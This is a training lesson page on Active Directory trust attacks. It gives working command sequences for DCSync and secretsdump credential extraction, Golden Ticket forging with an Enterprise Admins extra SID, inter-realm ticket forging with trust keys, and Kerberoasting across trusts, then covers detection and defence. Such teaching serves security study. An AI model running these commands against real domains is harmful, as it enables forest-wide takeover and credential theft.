Domain Trust Attacks | Active Directory Attacks

Active Directory Trust relationships allow users in one domain to access resources in another. They're essential for large organizations - but they're also pathways for attackers. Compromise one domain, and trusts can lead you to others.

Think of trusts like border agreements between countries. A trust says "citizens from Domain A can visit Domain B." But if you forge citizenship documents (like

Golden Tickets

with extra SIDs), you can claim to be anyone.

Trust = Access Expansion

Every trust relationship is a potential lateral movement path. In pentests, enumerating and exploiting trusts often leads from a child domain all the way to the forest root.

Types of Trusts

1Trust Types:
2├── Parent-Child Trust
3│   ├── Automatic between parent/child domains
4│   ├── Bidirectional and transitive
5│   └── child.corp.local ↔ corp.local
6├── Tree-Root Trust
7│   ├── Between forest root and new tree roots
8│   ├── Bidirectional and transitive
9│   └── corp.local ↔ subsidiary.local (same forest)
10├── Forest Trust
11│   ├── Between different forests
12│   ├── Typically bidirectional, can be one-way
13│   └── corp.local ↔ partner.local (different forests)
14├── External Trust
15│   ├── Between domains in different forests
16│   ├── Non-transitive
17│   └── Legacy, less common
18├── Shortcut Trust
19│   ├── Optimization between distant domains
20│   └── Reduces authentication hops
21└── Realm Trust
22    └── Between AD and non-Windows Kerberos (MIT)
23 
24Trust Properties:
25├── Direction: One-way or bidirectional
26├── Transitivity: Trust extends through chain or not
27└── SID Filtering: Enabled (secure) or disabled (exploitable)

Enumerating Trusts

powershell

1606070;"># PowerView
2Get-DomainTrust
3Get-DomainTrust -Domain corp.local
4Get-ForestTrust
5 
6606070;"># Output includes:
7606070;"># SourceName    : child.corp.local
8606070;"># TargetName    : corp.local
9606070;"># TrustType     : ParentChild
10606070;"># TrustAttributes : WITHIN_FOREST
11606070;"># TrustDirection : Bidirectional
12606070;"># WhenChanged   : 1/1/2024
13 
14606070;"># AD Module
15Get-ADTrust -Filter *
16Get-ADTrust -Identity 606070;">#a5d6ff;">"corp.local"
17 
18606070;"># nltest (built-in)
19nltest /domain_trusts
20nltest /trusted_domains
21 
22606070;"># Mapping the forest
23Get-ForestDomain  606070;"># All domains in current forest

bash

1606070;"># Linux enumeration
2606070;"># ldapsearch
3ldapsearch -x -H ldap:606070;">//dc.corp.local -D "user@corp.local" -w password \
4  -b 606070;">#a5d6ff;">"CN=System,DC=corp,DC=local" "(objectClass=trustedDomain)"
5 
6606070;"># BloodHound shows trust relationships
7606070;"># Look for cross-domain edges

Child to Parent Domain Escalation

1Child-Parent Trust Attack:
2├── You: Domain Admin in child.corp.local
3├── Target: Enterprise Admin in corp.local (forest root)
4├── Method: Forge Golden Ticket with Enterprise Admin SID
5 
6Why it works:
7├── Parent-child trusts disable SID filtering
8├── Child DA can create tickets with any SID
9├── Enterprise Admins SID = S-1-5-21-<ForestRootDomainSID>-519
10└── Add EA SID to Golden Ticket = instant forest compromise

Attack Steps

bash

1606070;"># Step 1: Get child domain KRBTGT hash (you're DA)
2secretsdump.py child.corp.local/Administrator:password@childdc.child.corp.local -just-dc-user krbtgt
3 
4606070;"># Step 2: Get forest root domain SID
5606070;"># Method 1: Query root domain
6lookupsid.py corp.local/user:password@dc.corp.local
7 
8606070;"># Method 2: From trust object
9Get-DomainTrust -Domain child.corp.local | Select-Object TargetName, TargetDomainSid
10 
11606070;"># Enterprise Admins SID = Root Domain SID + 519
12606070;"># e.g., S-1-5-21-1234567890-1234567890-1234567890-519
13 
14606070;"># Step 3: Forge Golden Ticket with EA SID
15ticketer.py -nthash CHILD_KRBTGT_HASH \
16  -domain-sid S-1-5-21-CHILD-DOMAIN-SID \
17  -domain child.corp.local \
18  -extra-sid S-1-5-21-ROOT-DOMAIN-SID-519 \
19  Administrator
20 
21606070;"># Step 4: Use ticket to access forest root DC
22export KRB5CCNAME=Administrator.ccache
23psexec.py -k -no-pass child.corp.local/Administrator@dc.corp.local
24 
25606070;"># You're now Enterprise Admin!

Forest Root = Game Over

Enterprise Admins have admin rights across the ENTIRE forest. From one child domain compromise, you can escalate to control every domain in the forest.

SID Filtering & SID History

1SID Filtering:
2├── Security mechanism on trust boundary
3├── Filters out SIDs not from trusted domain
4├── Prevents cross-domain privilege escalation
5├── ENABLED by default on external/forest trusts
6└── DISABLED by default on intra-forest trusts
7 
8SID History:
9├── Attribute storing previous SIDs
10├── Used during domain migrations
11├── Honored across trusts (if SID filtering off)
12├── Can be abused to inject privileged SIDs
13 
14If SID Filtering DISABLED:
15├── Golden Ticket with extra SIDs works
16├── SID History abuse works
17└── Full cross-trust privilege escalation
18 
19If SID Filtering ENABLED:
20├── Extra SIDs stripped at trust boundary
21├── Can't inject Enterprise Admin SID
22└── But other attacks may still work

Checking SID Filtering Status

powershell

1606070;"># Check trust attributes
2Get-DomainTrust | Select-Object TargetName, TrustAttributes
3 
4606070;"># TrustAttributes values:
5606070;"># WITHIN_FOREST (0x20) - Intra-forest, no SID filtering
6606070;"># FOREST_TRANSITIVE (0x08) - Forest trust
7606070;"># QUARANTINED_DOMAIN (0x04) - SID filtering enforced
8 
9606070;"># netdom
10netdom trust child.corp.local /domain:corp.local /quarantine

Cross-Forest Attacks

1Forest trusts typically have SID filtering ENABLED.
2Different attack approaches needed:
3 
4Option 1: Find users with cross-forest access
5├── Enumerate foreign group memberships
6├── User in Forest A might be in groups in Forest B
7└── Compromise that user = access to Forest B
8 
9Option 2: Kerberoast across trust
10├── Request TGS for SPNs in trusted forest
11├── Crack hashes offline
12└── Use cracked credentials
13 
14Option 3: Exploit shared service accounts
15├── Same service account in multiple forests
16└── Credentials from one work in other
17 
18Option 4: Find trust keys
19├── Trust keys are like machine account passwords
20├── Enable ticket forging across trust
21└── Requires high privilege in one forest

powershell

1606070;"># Find users in trusted forest groups
2Get-DomainForeignGroupMember -Domain partner.local
3 
4606070;"># Find SPNs in trusted forest
5Get-DomainUser -SPN -Domain partner.local
6 
7606070;"># Kerberoast across trust
8Rubeus.exe kerberoast /domain:partner.local
9 
10606070;"># certipy/GetUserSPNs.py also work cross-trust

Trust Key Attacks

1Trust Key (Trust Password):
2├── Shared secret between trusted domains
3├── Used to encrypt inter-realm TGTs
4├── Stored as machine account-like object
5├── Can be extracted with DCSync
6 
7If you have trust key:
8├── Create inter-realm TGT
9├── Present to trusted domain's KDC
10├── Get TGT in trusted domain
11└── Now operate in trusted domain

bash

1606070;"># Extract trust key (requires DA in one domain)
2secretsdump.py corp.local/Administrator:password@dc.corp.local
3 
4606070;"># Look for: child.corp.local$:...:HASH
5 
6606070;"># Or Mimikatz
7lsadump::dcsync /user:child.corp.local$ /domain:corp.local
8 
9606070;"># Create inter-realm TGT
10ticketer.py -nthash TRUST_KEY \
11  -domain-sid S-1-5-21-CHILD-SID \
12  -domain child.corp.local \
13  -spn krbtgt/CORP.LOCAL \
14  Administrator
15 
16606070;"># Use to get TGT in parent domain

Exploiting Foreign Principals

powershell

1606070;"># Find foreign principals in local groups
2Get-DomainForeignGroupMember
3 
4606070;"># Output:
5606070;"># GroupDomain    : corp.local
6606070;"># GroupName      : Domain Admins
7606070;"># MemberDomain   : partner.local
8606070;"># MemberName     : admin_partner
9 
10606070;"># This means admin_partner from partner.local
11606070;"># is Domain Admin in corp.local!
12 
13606070;"># If you compromise admin_partner in partner.local
14606070;"># You're DA in corp.local via trust
15 
16606070;"># Find in BloodHound
17MATCH p=(n)-[:MemberOf*1..]->(g:Group)
18WHERE n.domain <> g.domain
19RETURN p

Detection & Defense

1Detection:
2├── Event ID 4769 - Cross-domain TGS request
3├── Event ID 4768 - Inter-realm TGT usage
4├── Tickets with SID History/extra SIDs
5│   └── Unusual for normal operations
6├── Trust modifications
7│   └── Event ID 4706, 4707, 4716
8└── BloodHound paths crossing trust boundaries
9 
10Defense:
11├── Enable SID Filtering on all trusts
12│   └── netdom trust /domain: /quarantine:yes
13├── Use Selective Authentication
14│   └── Explicit access grants only
15├── Minimize cross-forest group memberships
16├── Monitor for inter-realm ticket activity
17├── Regular trust relationship audits
18├── Protected Users group (no delegation across trusts)
19└── Minimize number of trusts

Selective Authentication

Instead of trusting all users from a domain, Selective Authentication requires explicit permission for each resource. More restrictive but more secure.

Trust Attack Methodology

Trust Exploitation Flow

Map TrustsEnumerate all trust relationships

Check FilteringDetermine if SID filtering is enabled

Find PathsLook for cross-trust group memberships

Get KeysDCSync trust keys if possible

Forge TicketsCreate tickets with extra SIDs

EscalateUse access to compromise more domains

Knowledge Check

Quick Quiz

Question 1 of 3

What allows child-to-parent domain escalation?

Challenges

Forest Root Compromise

Challenge

💀 advanced

From Domain Admin in a child domain, forge a Golden Ticket with Enterprise Admins SID to compromise the forest root.

Need a hint? (4 available)

Key Takeaways

Parent-child trusts lack SID filtering = easy escalation
Enterprise Admins SID (519) grants forest-wide access
SID filtering blocks extra-SID attacks on forest trusts
Foreign group memberships create cross-trust paths
Trust keys enable inter-realm ticket forging
Always enumerate trusts - they expand your attack surface

Related Lessons

Golden Ticket

DCSync Attack

AD Architecture